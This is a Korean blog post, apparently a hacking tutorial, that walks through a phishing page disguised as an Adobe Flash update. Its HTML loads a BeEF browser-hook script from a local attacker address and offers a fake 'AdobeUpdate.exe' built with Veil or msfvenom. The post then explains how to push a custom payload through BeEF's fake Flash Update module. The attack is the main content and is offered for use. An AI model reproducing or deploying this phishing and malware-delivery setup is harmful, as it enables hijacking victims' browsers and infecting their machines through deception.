[코드]
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Adobe flash</title>
<script src="http://192.168.0.8:3000/hook.js" charset="utf-8"></script>
</head>
<body><center>
<img src="adobe.jpeg" alt="adobe" width="500" length="500">
<p><input type="button" name="btnDownload" value="Update" onclick="window.open
('AdobeUpdate.exe','download')" return false;/></p>
</body>
</html>
AdobeUpdate.exe 바이러스를 만든 뒤(veil 이나 msfvenom) /var/www/html에 넣어두고 페이지를 열면
adobe.jpeg [미리 만들어둔 adobe 페이크 이미지] 와 함께 피싱페이지가 나오고 버튼을 누르면 바이러스가 다운로드 된다.
하지만 좀 더 레벨 높은 해킹을 위해 beef의 fake Flash Update 기능을 사용한다.
social engineering 목록에 있으며,
image 란은 http://192.168.0.8:3000/adobe/flash_update.png
payload는 custom_payload
custom payload URL 은 http://192.168.0.8 로 셋 해준뒤 execute를 눌러준다.
그러면 새로운 페이크 어도비 업데이트 창이나오며 install을 누르면 custom payload url로 넘어가게된다.
'3. 웹 애플리케이션 취약점 진단' 카테고리의 다른 글
MITMF를 이용해서 웹사이트 해킹하기 & 다운로드 하는 파일에 자동 바이러스 주입 [보너스:웹사이트 이미지 거꾸로 만들기] (0) | 2023.12.27 |
---|---|
도스 공격하는 방법 feat. Ettercap (0) | 2023.12.27 |
계정을 해킹할때 사용하는 Man in the Middle 사용하기[mitmf] (0) | 2023.12.27 |
DNS 스푸핑을 활용한 피싱사이트 제작 (0) | 2023.12.27 |
브라우저 링크에 방문한 것으로 좀비pc로 만드는법 [beEf-XSS] (0) | 2023.12.27 |